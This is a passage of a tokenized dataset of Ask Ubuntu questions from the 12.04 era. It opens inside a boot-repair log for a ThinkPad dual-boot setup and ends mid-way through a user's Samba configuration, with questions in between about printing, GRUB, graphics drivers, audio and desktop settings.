0x00000000d7869000-0x00000000d786a000 ) ( 0mb ) [ 0.000000 ] efi : mem27 : type=7 , attr=0xf , range= [ 0x00000000d786a000-0x00000000d786b000 ) ( 0mb ) [ 0.000000 ] efi : mem28 : type=4 , attr=0xf , range= [ 0x00000000d786b000-0x00000000d786c000 ) ( 0mb ) [ 0.000000 ] efi : mem29 : type=7 , attr=0xf , range= [ 0x00000000d786c000-0x00000000d786d000 ) ( 0mb ) [ 0.000000 ] efi : mem30 : type=4 , attr=0xf , range= [ 0x00000000d786d000-0x00000000d825f000 ) ( 9mb ) [ 0.000000 ] efi : mem31 : type=7 , attr=0xf , range= [ 0x00000000d825f000-0x00000000d8261000 ) ( 0mb ) [ 0.000000 ] efi : mem32 : type=4 , attr=0xf , range= [ 0x00000000d8261000-0x00000000d82f7000 ) ( 0mb ) [ 0.000000 ] efi : mem33 : type=7 , attr=0xf , range= [ 0x00000000d82f7000-0x00000000d82f8000 ) ( 0mb ) [ 0.000000 ] efi : mem34 : type=4 , attr=0xf , range= [ 0x00000000d82f8000-0x00000000d8705000 ) ( 4mb ) [ 0.000000 ] efi : mem35 : type=7 , attr=0xf , range= [ 0x00000000d8705000-0x00000000d8706000 ) ( 0mb ) [ 0.000000 ] efi : mem36 : type=4 , attr=0xf , range= [ 0x00000000d8706000-0x00000000d8761000 ) ( 0mb ) [ 0.000000 ] efi : mem37 : type=7 , attr=0xf , range= [ 0x00000000d8761000-0x00000000d8768000 ) ( 0mb ) [ 0.000000 ] efi : mem38 : type=4 , attr=0xf , range= [ 0x00000000d8768000-0x00000000d9b9f000 ) ( 20mb ) [ 0.000000 ] efi : mem39 : type=7 , attr=0xf , range= [ 0x00000000d9b9f000-0x00000000d9e4c000 ) ( 2mb ) [ 0.000000 ] efi : mem40 : type=2 , attr=0xf , range= [ 0x00000000d9e4c000-0x00000000d9e52000 ) ( 0mb ) [ 0.000000 ] efi : mem41 : type=3 , attr=0xf , range= [ 0x00000000d9e52000-0x00000000da59f000 ) ( 7mb ) [ 0.000000 ] efi : mem42 : type=5 , attr=0x800000000000000f , range= [ 0x00000000da59f000-0x00000000da6c3000 ) ( 1mb ) [ 0.000000 ] efi : mem43 : type=5 , attr=0x800000000000000f , range= [ 0x00000000da6c3000-0x00000000da79f000 ) ( 0mb ) [ 0.000000 ] efi : mem44 : type=6 , attr=0x800000000000000f , range= [ 0x00000000da79f000-0x00000000da8b1000 ) ( 1mb ) [ 0.000000 ] efi : mem45 : type=6 , attr=0x800000000000000f , range= [ 0x00000000da8b1000-0x00000000da99f000 ) ( 0mb ) [ 0.000000 ] efi : mem46 : type=0 , attr=0xf , range= [ 0x00000000da99f000-0x00000000daa22000 ) ( 0mb ) [ 0.000000 ] efi : mem47 : type=0 , attr=0xf , range= [ 0x00000000daa22000-0x00000000daa9b000 ) ( 0mb ) [ 0.000000 ] efi : mem48 : type=0 , attr=0xf , range= [ 0x00000000daa9b000-0x00000000daa9c000 ) ( 0mb ) [ 0.000000 ] efi : mem49 : type=0 , attr=0xf , range= [ 0x00000000daa9c000-0x00000000daa9f000 ) ( 0mb ) [ 0.000000 ] efi : mem50 : type=10 , attr=0xf , range= [ 0x00000000daa9f000-0x00000000daadd000 ) ( 0mb ) [ 0.000000 ] efi : mem51 : type=10 , attr=0xf , range= [ 0x00000000daadd000-0x00000000dab9f000 ) ( 0mb ) [ 0.000000 ] efi : mem52 : type=9 , attr=0xf , range= [ 0x00000000dab9f000-0x00000000dabdc000 ) ( 0mb ) [ 0.000000 ] efi : mem53 : type=9 , attr=0xf , range= [ 0x00000000dabdc000-0x00000000dabff000 ) ( 0mb ) [ 0.000000 ] efi : mem54 : type=4 , attr=0xf , range= [ 0x00000000dabff000-0x00000000dac00000 ) ( 0mb ) [ 0.000000 ] efi : mem55 : type=7 , attr=0xf , range= [ 0x0000000100000000-0x000000021e600000 ) ( 4582mb ) [ 0.000000 ] efi : mem56 : type=11 , attr=0x8000000000000001 , range= [ 0x00000000f80f8000-0x00000000f80f9000 ) ( 0mb ) [ 0.000000 ] efi : mem57 : type=11 , attr=0x8000000000000001 , range= [ 0x00000000fed1c000-0x00000000fed20000 ) ( 0mb ) [ 0.000000 ] acpi : uefi 00000000dabde000 0003e ( v01 lenovo tp-8d 00001280 ptl 00000002 ) [ 0.000000 ] acpi : uefi 00000000dabdd000 00042 ( v01 ptl combuf 00000001 ptl 00000001 ) [ 0.000000 ] acpi : uefi 00000000dabdc000 00292 ( v01 lenovo tp-8d 00001280 ptl 00000002 ) [ 0.795807 ] fb0 : efi vga frame buffer device [ 1.057243 ] efi variables facility v0.08 2004-may-17 [ 9.122104 ] fb : conflicting fb hw usage inteldrmfb vs efi vga - removing generic driver readefi : /dev/sda , n 128 , 0 , , prstart 1024 , prsize 128 warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . =================== partitions & disks : sda4 : sda , not-sepboot , grubenv-ok grub2 , grub-efi , update-grub , 64 , with-boot , is-os , gpt-but-not-efi , fstab-has-bad-efi , no-nt , no-winload , no-recov-nor-hid , no-bmgr , no-grldr , no-b-bcd , apt-get , grub-install , . sda3 : sda , maybesepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , gpt-but-not-efi , part-has-no-fstab , no-nt , haswinload , no-recov-nor-hid , no-bmgr , no-grldr , no-b-bcd , nopakmgr , nogrubinstall , /mnt/boot-sav/sda3 . sda1 : sda , maybesepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , is-correct-efi , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , no-grldr , no-b-bcd , nopakmgr , nogrubinstall , /boot/efi . sda5 : sda , maybesepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , gpt-but-not-efi , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , no-grldr , no-b-bcd , nopakmgr , nogrubinstall , /home . sda : gpt-bis , gpt , no-bios_boot , has-correctefi , 2048 sectors * 512 bytes =================== parted : model : ata hitachi hts72323 ( scsi ) disk /dev/sda : 320gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 1049kb 106mb 105mb fat32 efi system partition boot 2 106mb 240mb 134mb microsoft reserved partition msftres 3 240mb 87.2gb 87.0gb ntfs basic data partition 4 87.2gb 169gb 81.9gb ext4 5 169gb 316gb 147gb ext4 6 316gb 320gb 4096mb linux-swap ( v1 ) =================== mount : /dev/sda4 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda1 on /boot/efi type vfat ( rw ) /dev/sda5 on /home type ext4 ( rw ) gvfs-fuse-daemon on /home/vierlex/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=vierlex ) /dev/sda3 on /mnt/boot-sav/sda3 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /sys/block/sda : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sda1 sda2 sda3 sda4 sda5 sda6 size slaves stat subsystem trace uevent /dev : agpgart autofs block bsg btrfs-control bus char console core cpu cpu_dma_latency disk dri ecryptfs fb0 fd full fuse hpet input kmsg log mapper mcelog mei mem net network_latency network_throughput null oldmem port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda1 sda2 sda3 sda4 sda5 sda6 sg0 shm snapshot snd stderr stdin stdout tpm0 uinput urandom usbmon0 usbmon1 usbmon2 v4l vga_arbiter video0 watchdog zero /dev/mapper : control /boot/efi : efi /boot/efi/efi : boot microsoft ubuntu /boot/efi/efi : boot microsoft ubuntu /boot/efi/efi/boot : bootx64.efi /boot/efi/efi/ubuntu : grubx64.efi warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . =================== df : filesystem type size used avail use % mounted on /dev/sda4 ext4 77g 4.1g 69g 6 % / udev devtmpfs 3.9g 12k 3.9g 1 % /dev tmpfs tmpfs 1.6g 864k 1.6g 1 % /run none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 3.9g 152k 3.9g 1 % /run/shm /dev/sda1 vfat 96m 18m 79m 19 % /boot/efi /dev/sda5 ext4 137g 2.2g 128g 2 % /home /dev/sda3 fuseblk 81g 30g 52g 37 % /mnt/boot-sav/sda3 =================== fdisk : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf34fe538 device boot start end blocks id system /dev/sda1 1 625142447 312571223+ ee gpt =================== before mainwindow fsck no pastebin yes wubi no winboot yes recommendedrepair , purge , qty_of_part_for_reinstal 1 no-kernel-purge unhideboot_action yes ( 10s ) , noflag ( ) part_to_reinstall_grub sda4 , force_grub no ( sda ) removabledisk no use_separatebootpart no ( sda3 ) grub2 ( ) uncomment_gfxmode no ata add_kernel_option no ( acpi=off ) mbr_to_restore ( ) efi detected . please check the options . =================== actions fsck no pastebin yes wubi no winboot no bootinfo , nombraction , qty_of_part_for_reinstal 1 no-kernel-purge unhideboot_action no ( 10s ) , noflag ( ) part_to_reinstall_grub sda4 , force_grub no ( sda ) removabledisk no use_separatebootpart no ( sda3 ) grub2 ( ) uncomment_gfxmode no ata add_kernel_option no ( acpi=off ) mbr_to_restore ( ) no change has been performed on your computer . see you soon ! internet : connected thanks for your time and attention . edit : additional info request = > no boot loader is installed in the mbr of /dev/sda . but maybe this is how it is supposed to work ? yea this is ok. boot stuff seems to be on a seperate partition , in my case sda1 . i 'm very new to this uefi thing too . missing files like bootmgr i do n't really have a clue : d but yea , maybe thats how it suppose to be ? instead and whats not shown in the log for some reason : there is additional microsoft bootfiles on sda1 under /efi/microsoft/ [ much stuff ] i remember also doing some kind of hack to make a uefi windows 7 usb stick . http : //jake.io/b/2011/installing-windows-7-with-uefi-boot-on-an-x220-from-usb/ in short : creating and placing bootx64.efi on the stick so it can be booted in uefi mode . boot order i decide that in my bios . i read somwhere that the thinkpad x220 ( essential part of the serial number : 4921 http : //www.lenovo.com/shop/americas/content/user_guides/x220_x220i_x220tablet_x220itablet_ug_en.pdf ) doesnt really have uefi interface or something , still , these 2 options are listed with all the other usual devices you can give a boot priority to . right now it looks like this : boot priority order 1. ubuntu 2 . windows boot manager 3 . usb fdd 4 . usb hdd 5 . ata hdd0 hitachi [ random string ]
125192	`` /usr/lib/cups/filter/pstoufr2cpca failed '' error when trying to print from a canon mf8030cn	i have not been able to get my mf8030cn printer working on ubuntu 12.04 . 64bit i have googled for days and tried every tip i could find , including a long thread on the ubuntu forums , but no luck . the error message is /usr/lib/cups/filter/pstoufr2cpca failed any ideas ?
125193	tabbing out of the unity search box	when i type something into the unity search box , i have to press the down arrow twice to get to the results area . where does the first press take the focus , and is there a way to change the config so that only one press of the arrow key is required to get to the results ?
125201	what package provides the color scheme for the wifi widget with the oxygen desktop theme in kubuntu ?	i ca n't figure out what package provides the color scheme for the wifi widget in the oxygen desktop theme under kubuntu . as you can see , the fonts are too dark when using this theme . i 'd like to change the font color or report this bug against the correct package .
125209	how to avoid files being replaced with older versions in ubuntu one ?	ubuntuone for windows has replaced an openoffice document with an older version of the file . i am syncing between 2 windows machines and one ubuntu machine . fortunately i was able to recover my work from my nightly backup . is there some kind of log file that might help me figure out what when wrong , or how to avoid this in the future ?
125210	how to edit cd rip settings in rhythmbox to improve mp3 quality	i 'm trying to edit the mp3 rip settings in rhythmbox in order to increase the quality to 320 kbs , but the edit button is locked in ubuntu 12.04 http : //ubuntuone.com/4qqbhz20rmwwrrzynk2ctz any help please ? thanks.-
125213	execute command before starting terminal copy file	what happens i write this line to copy an image to my local home dir cp .cache/wallpaper/0_4_1280* .image.jpg and all is well ... .so i think it would be great if terminal would do this on start . so i decide to put the line in the box to run custom command instead of shell ... . and of course no matter how i alter the line terminal will not stat the dir and complains that dir/file doesnt exist when we know it does . if i put ls -a in the box it shows the .cache folder but will not go into it . i 'm starting to think i 'm going about this all wrong . so now that i 've shown what i 'm after , what i tried and what happens this is ... . what i want to happen when i click to launch terminal i would like it to execute this command and then restart at the regular prompt . what i think i need to do is write some short bash script that will detach gnome terminal and then execute the copy command and then restart or reattach the terminal window . one more thing that might be an issue , ( might be the one thing that is holding this all up , i dunno ) is that the star is there in the copy command because the file changes ( it is in the .cache folder ) so the first part is always the same but the rest of the filename changes as it rotates in the .cache . which is why i want to constantly copy the new image to a known filename , because it changes ... .. and i need to reference it . its seems so easy ... .yet i cant make it go ... i do n't get it
125223	dual-boot windows 8 and ubuntu , separate hdd , win8 boot failure from grub	background : i installed ubuntu 11.04 on my desktop , well , after april last year . i upgraded in november to 11.10 . around a month ago , i popped the sata and power cables for the hard drive ubuntu is on and installed windows 8 cp to the second hard drive . ( to see if i could use it as a desktop os ) three days ago , i re-connected the ubuntu drive , used update-manager -d to go to 12.04 pre-release , and did update-grub to make sure it found the new partition . also , i switched my default boot hdd to the ubuntu one . ( it continued to default to the win8 one even after re-connecting the ubuntu one . ) now , when i boot , i get grub , and can boot ubuntu just fine . grub also includes an entry for windows 8 loader . this entry will show the beeta fish ( showing that it is in fact booting windows 8 or some lower-level part thereof ) onscreen and then a message flashes by which is 7 or 8 lines long but i can not read . then , my computer starts up again and i see bios/post come up as though i had hit the power button following a successful power off . changing the default boot hdd or using the menu activated by pressing f8 during bios/post to select the proper drive both result in a successful windows 8 boot . how can i either a ) reconfigure grub to properly boot windows ( of course , while still booting ubuntu ) or b ) configure the windows bootloader to show up and give me the option of the ubuntu hard drive ( in which case i would turn off the grub menu and use the windows drive as my default ) . using another bootloader ( for instance , burg ) is okay , so long as you provide simple instructions and the boot-loader is open-source and available by ppa or a .deb file .
125224	how do i hide rhythmbox to just show a tray icon ?	ever since ubuntu 11.10 , it has seemingly been impossible to hide rhythmbox and have it display just a tray icon . instead , when lowering it , it is still shown in my window list down the bottom of my screen , which is needlessly taking up space . in the past , when closing the rhythmbox window , it would disappear from the screen completely , and just show a tray icon in the top right hand corner of my screen , which i could use to show/hide it . i 'm using ubuntu 12.04 now , and it has exactly the same problem with this as it did in 11.10 . i 'm using the gnome classic desktop . rhythmbox is displayed in the sound section of the indicator-applet , but i ca n't see any way to get it to hide completely . is there any way to replicate the old pre-11.10 behavior where it would display only a tray icon and nothing else ?
125228	are any programs not safe to uninstall ?	as we know , ubuntu comes with a lot installed on it . many of them i either do n't know what it does or just do n't use . which applications are safe to uninstall ? i use mainly the basic stuff , firefox , thunderbird , empathy , shotwell , document and photo viewers . i do n't think i need something like xdiagnose or xterm
125230	how to setup an extetended monitor with xrandr on my acer aspire one ?	i 'm trying to setup an external monitor to extend my desktop for my acer aspire one netbook running ubuntu 10.10 . it is running an atom n2600 with an intel integrated graphics controller . lspci | grep vga output is : 00:02.0 vga compatible controller : intel corporation device 0be1 ( rev 09 ) xrandr output is : xrandr : failed to get size of gamma for output default screen 0 : minimum 1024 x 600 , current 1024 x 600 , maximum 1024 x 600 default connected 1024x600+0+0 0mm x 0mm 1024x600 0.0* my external monitor only appears to get a signal when it is connected and i reboot the netbook , at that time i get a mirrored display . the resolutions of netbook 's display and external lcd are 1024x600 and 1920x1280 respectively . xrandr never shows 2 displays . how can i get xrandr to see two different displays so that i can configure them ?
125235	headphones very quiet with realtek alc663 ( intel hda 82801ji )	i 'm running ubuntu 12.04 on an asus g71-gx with an intel 82801ji ( ich10 family ) hd audio controller ( using the hda intel driver ) . the codec is a realtek alc663 . when i plug in headphones ( using the built-in 1/8 '' stereo jack ) , they are detected and the audio level is appropriate but the sound through the headphones is very quiet . tested with multiple headphones , jack works fine in windows . any suggestions ?
125243	how do i open a new instance of an application by default in gnome ?	i have a terminal open and want to launch another one . i hit the windows key , type 'terminal ' and hit enter ... and i 'm warped to my first terminal . i can hit control+enter to launch a new terminal . this is unnatural to me . can i change the key bindings so that enter will launch a new instance and control+enter will warp to the existing one ? edit : i 'm interested in all applications , not just a terminal .
125245	how do i stop video tearing ? ( nvidia prop driver , non-compositing window manager )	i have that problem which seemingly afflicts many using the proprietary nvidia driver : video tearing : fine horizontal lines ( usually near the top of my display ) when there is a lot of panning or action in the video . ( note : switching back to the default nouveau driver is not an option , as its seemingly nonexistent power-management drains my battery several times faster ) i 've tried totem , parole , and vlc , and tearing occurs with all of them . the best result has been to use x11 output in vlc , but there is still tearing with relatively moderate action . hardware : macbook air 3,2 -- which has an nvidia geforce 320m . there are two common fixes for tearing with nvidia prop drivers : turn off compositing , since nvidia proprietary drivers do n't usually play nice with compositing window managers on linux ( compiz is an exception i 'm aware of ) . but i use an extremely lightweight window manager ( awesome window manager ) which is not even capable of compositing ( or any cool effects ) . i also have this problem in xfce , where i have compositing disabled . enabling sync to vblank . to enable this , i set the option in nvidia-settings and then autostart it as nvidia-settings -l with my other autostart programs . this seems to work , because when i run glxgears , i get : $ glxgears running synchronized to the vertical refresh . the framerate should be approximately the same as the monitor refresh rate . 303 frames in 5.0 seconds = 60.500 fps 300 frames in 5.0 seconds = 59.992 fps and when i check the refresh rate using nvidia-settings : $ nvidia-settings -q refreshrate attribute 'refreshrate ' ( wampum:0.0 ; display device : dfp-2 ) : 60.00 hz . all this suggests sync to vblank is enabled . as i understand it , this is precisely designed to stop tearing , and a lot of people 's problem is even getting something like glxgears to output the correct info . i do n't understand why it 's not working for me . xorg.conf : http : //paste.ubuntu.com/992056/ example of observed tearing : :
125247	why do n't unity 's window placement shortcuts work ?	i am trying to use the unity 's window placement shortcuts on ubuntu 11.10 but they just do n't seem to work . i even installed the package ccsm to ensure that the grid option is enabled and the keyboard shortcuts are set the same as the standard unity 's shortcuts . the shortcuts are displayed in following list : ctrl-alt-numpad 7 - place window in top left corner of screen . ctrl-alt-numpad 8 - place window in top half of screen . ctrl-alt-numpad 9 - place window in top right corner of screen . ctrl-alt-numpad 5 - center/maximize the window in the middle of the screen . ctrl-alt-numpad 1 - place window in the bottom left corner of the screen . ctrl-alt-numpad 2 - place window in the bottom half of the screen . ctrl-alt-numpad 3 - place window in the bottom right corner of the screen . ctrl-alt-numpad 0 - minimize the current window . what may be the cause for this problem ?
125254	64 bit on dell precision m6600 hangs on reboot and shut down	i am new to ubuntu and i discovered that i ca n't shut down ( then black screen with some lines of text shows ) and reboot ( then the purple screen with dots appear ) . i need to hold the power button in order to turn it off . what is causing this ? should i install the 32 bit version instead ?
125257	how do i add an additional hard drive ?	i am going to put an additional ( non-usb ) hard drive in my system . i already have ubuntu on my other hard drive so i do not want to install ubuntu on the additional drive but only use it for storage . how do i add the additional hard drive to my ubuntu system , e.g . make ubuntu recognize it and mount it properly ?
125259	how do i install gnome-boxes ?	boxes is part of `` the gnome desktop '' , but does n't appear to be in the official repositories . what do i need to do to get it installed ? will it ever be made available for ubuntu 12.04 lts ?
125264	where can i download the latest release of ubuntu ?	a new version of ubuntu has been released . i still ca n't find it on ubuntu.com . where can it be downloaded from , or is it the only way to install it using update-manager to upgrade an existing installation ?
125272	how to check for updates more often than daily ?	i 've been curious if there is a way to make it so that the update manager can check for updates say every few hours rather than daily . now , i know that i can run sudo apt-get update to check , but it would be nice to have it show it to me more often ... i love having the most up to date system that i can .
125279	do i need to uninstall 10.04 to upgrade to 12.04 ?	i currently have ubuntu 10.04 installed alongside windows 7 and would like to uninstall it so i can use 12.04 . having looked on the net it seems as if it is rather complicated to uninstall without encountering anuy issues . does anyone know of an idiot proof way of uninstalling without breaking my laptop . im not that technical when it comes to dealing with operating systems
125280	what are the minimum system requirements for 12.04 lts ?	i have a 2nd generation core i3 processor ( 2.30 ghz ) . it was preloaded with 64-bit windows 7 . it ran smoothly with 2 gb ram . will ubuntu 64-bit be the same or does it require 4 gb or more ?
125288	how to obtain same original workspace-switcher when using xfce ? using ubuntu 11.10	i installed 11.10 to try it . started with the default desktop ( i think it is called the gnome shell ) , which is like this image shows http : //iloveubuntu.net/ubuntu-1110s-workspace-switcher-features-new-fancy-behavior now i installed xfce to try it , using this command : sudo aptitude install xubuntu-desktop and logged out and then selected xfce session ( i also saw xubuntu session there to select , was not sure , but for now i use xfce ) . then i login my question is : i really liked the workspace-switcher on default desktop before . because i can click on it , and see all 4 desktops at once , so i can more easily move windows from one to another by just dragging it , and can see more easily which one i can to go to . like the image above shows . now with xfce , i have to select a window , right click , say move to this workspace , etc ... , which is not as easy to do as before . is there a way to do something like this on xfce ? i see on the panel at the top of xfce the 4 virtual desktops , but i like to see them like with the original desktop , all at once on the desktop . thanks ,
125289	speeding up a video with audio	i am trying to speed up an mp4 video ( and save it ) ! i tried different tools ( including openshot , ffmpeg ) , but the problem is that the video is played at a faster speed , but the audio is gone ! does anybody know how i can do that in ubuntu ? thanks
125297	how can i fix ttf fonts ' ligatures ( tt , ti , fi , ff , etc ) in firefox ?	with certain windows fonts there is a display issue where ligature-kerning seems to flip out and make the two letters bold . here 's a screenshot of an email using helvetica in firefox : as you can see , it seems to be something about the way crossed characters ( t and f ) connect to each other and letters like i. i 've had this problem for a very long time ( over multiple systems ) and wondered if anybody has ever seen similar issues popping up and found a way to fix them . note : i think this does just affect firefox . chrome and libreoffice are both fine .
125301	a program has too many menu entries . how can i see them all ?	i want to use lives with ubuntu 11.10 . unfortunately my screen is not very wide and lives has many menu entries so that i can not see all of them . is there any way that i can see and use all menu entries ? i took a screenshot , so you can see the problem :
125305	how to say `` thanks '' to the ubuntu developers ?	the release of ubuntu 12.04 is imminent and it 's ( once again ) quite a fine release . now i 'd like to show my appreciation of all the work developers have put into ubuntu over the last six months . what' s the best way to do that ?
125314	how do i call a dialog for authentication ?	i am writing a gui program using wx module in python . in program whenever i am accessing a folder which requires root privilege then it asks password at terminal but i want to display the dialog to user to enter the password and authenticate him . how to call that dialog and authenticate the user in ubuntu ?
125317	sum over unique tags in a range	suppose i have a spreadsheet in which i track my fruit purchases . it might look like this : date item amount 1-apr-2012 apple .35 2-apr-2012 pear .40 3-apr-2012 apple .36 i want a summary range that looks like this : apple .71 pear .40 in other words , i 've picked unique `` item '' values and summed over them . this seems like something a spreadsheet ought to be able to do , but i 've not been able to find it in the gnumeric manual nor googling . ( and maybe the answer is the python plugin . ) ( i originally tagged this openoffice , as there was no gnumeric tag . i suspect there 's a way to do this in ooo iff there 's a way in gnumeric . thanks to the kind soul who created a gnumeric tag and retagged ! )
125321	why is ubuntu named ubuntu ?	i have long been interested in something . i know a lot of things about the history of ubuntu , but i do not know about the name . so , why is ubuntu named `` ubuntu '' ?
125324	why i can not run php or jsp applications on apache2.2 ? ( var/www )	i have recently installed apache 2.2 from repos . im trying to run php and jsp pages using that server . what im doing is , frist im creating the pages using gedit and then copy/pasting them to var/www when im trying to access the pages from localhost im getting raw text . the scripts on those pages does not executing . when i run `` php -version '' im getting this : php 5.3.6-13ubuntu3.6 with suhosin-patch ( cli ) ( built : feb 11 2012 02:17:16 ) copyright ( c ) 1997-2011 the php group zend engine v2.3.0 , copyright ( c ) 1998-2011 zend technologies i have php , apache so what i need more to do to run php ?
125326	i can not see images in goldendict !	i see a small box and a cross sign in the middle of that in place of images . anyone having the same issue ? !
125328	will ccsm work better with 12.04 ?	in my ubuntu 11.10 , compiz completely knackered my setup and i was wondering wil this still be a problem with all the unity plugins in 12.04 ?
125332	how to use my wireless card on my computer	i am quite new with ubuntu and i would like help using my wireless card . how do i connect wirelessly to the internet ?
125333	newly installed 12.04 on radeon or nvidia type of gfx card ?	i use a nvidia quadro nvs 290/pcie/sse2 at work with dual monitor setup . since 11.10 things has gone downwards with performance . but now with 12.04 performance is even worse , and i can agree that the 290 is old and puny . so when i look what low profile cards i can get to my computer today , the choice it radeon hd 6570 or nvidia quadro 600 . i have always used nvidia on linux beq i think that historically their drivers worked better . but which one do you recommend today on 12.04 and unity3d ? -- regards falk
125334	how to enable plymouth bootscreen animation ?	my netbook , running lucid , ca n't display bootscreen animation . i want to know how to enable it . my netbook is acer aspire one d260 . intel atom n450 , 1gb ram and gma 3150 . i know a tool called rcconf able to turns on/off services using the scripts in /etc/init.d/ . i thought maybe plymouth can be initialized there but i 'm not really sure and i do n't how to do it . thank you .
125336	how to run libreoffice from start menu ?	i just installed libreoffice in my lucid through official ppa at http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ . it wo n't start from start menu but it works if i run it through terminal with sudo . below the output when i try to run libreoffice from start menu . thank you . ecd : 58 : ca n't cd to ../lib/libreoffice/program exec : 180 : /usr/bin/x11/oosplash : not found
125340	how do i configure my machine so that i can log in with a fingerprint ?	i setup fingerprint authentication using this howto : http : //lauri.vosandi.eu/blog/ ? p=1069 after this , i can log in using fingerprint and password , but i want to log in using only fingerprint ( and using password if finger does not work ) . can you please help me ? thank you , daniel costa
125342	how can i install python 2.6 on 12.04 ?	according to https : //wiki.ubuntu.com/precisepangolin/releasenotes/ubuntudesktop `` python 2.6 is no longer available for install '' . i need to support legacy software that runs only on python 2.6 . how can i install python 2.6 on ubuntu 12.04 ?
125343	how do i type [ and \ with a mac keyboard ?	i am using a mac with an apple wireless keyboard - french . i have installed ubuntu as virtual machine by vmware fusion . the keyboard setting of ubuntu is as follows : and the preview is not exactly as apple wireless keyboard - french : in mac , we can type \ and [ by : \ = option ⌥ + shift ⇧ + : [ = option ⌥ + shift ⇧ + 5 however , it does n't work under ubuntu . could anyone tell me how to type \ and [ under ubuntu ? also , is there a keyboard other than french , that i currently set , which fits better my mac keyboard ?
125344	unable to connect to samba share folders - desperation ahead	today i set up a ubuntu server 10.04 lts on our computer @ work , /home was requested to be encrypted . i installed samba and configured it according to several tutorials on the net - and i 'm completely confused by my problem here ... i added a user in the system adduser smbuser -- ingroup sambashare and also added the same user with the same password to samba smbpasswd -a smbuser after that i create two directories at the designate location where i want to have my samba shares located at , both of them are in the sambashare group with owner nobody drwxrw-rw- 2 nobody sambashare 4096 2012-04-25 16:40 office drwxrw-rw- 2 nobody sambashare 4096 2012-04-26 10:36 public so i configured the smb.conf like this : # # sample configuration file for the samba suite for debian gnu/linux . # # # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options most of which # are not shown in this example # # some options that are often worth tuning have been included as # commented-out examples in this file . # - when such options are commented with `` ; '' , the proposed setting # differs from the default samba behaviour # - when commented with `` # '' , the proposed setting is the default # behaviour of samba but the option is considered important # enough to be mentioned here # # note : whenever you modify this file you should run the command # `` testparm '' to check that you have not made any basic syntactic # errors . # a well-established practice is to name the original file # `` smb.conf.master '' and create the `` real '' config file with # testparm -s smb.conf.master > smb.conf # this minimizes the size of the really used smb.conf file # which , according to the samba team , impacts performance # however , use this with caution if your smb.conf file contains nested # `` include '' statements . see debian bug # 483187 for a case # where using a master file is not a good idea . # # ======================= global settings ======================= [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = workgroup # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = no # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # what naming service and in what order should we use to resolve host names # to ip addresses ; name resolve order = lmhosts host wins bcast # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . security = user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . encrypt passwords = true # if you are using encrypted passwords , samba will need to know what # password database type you are using . passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this 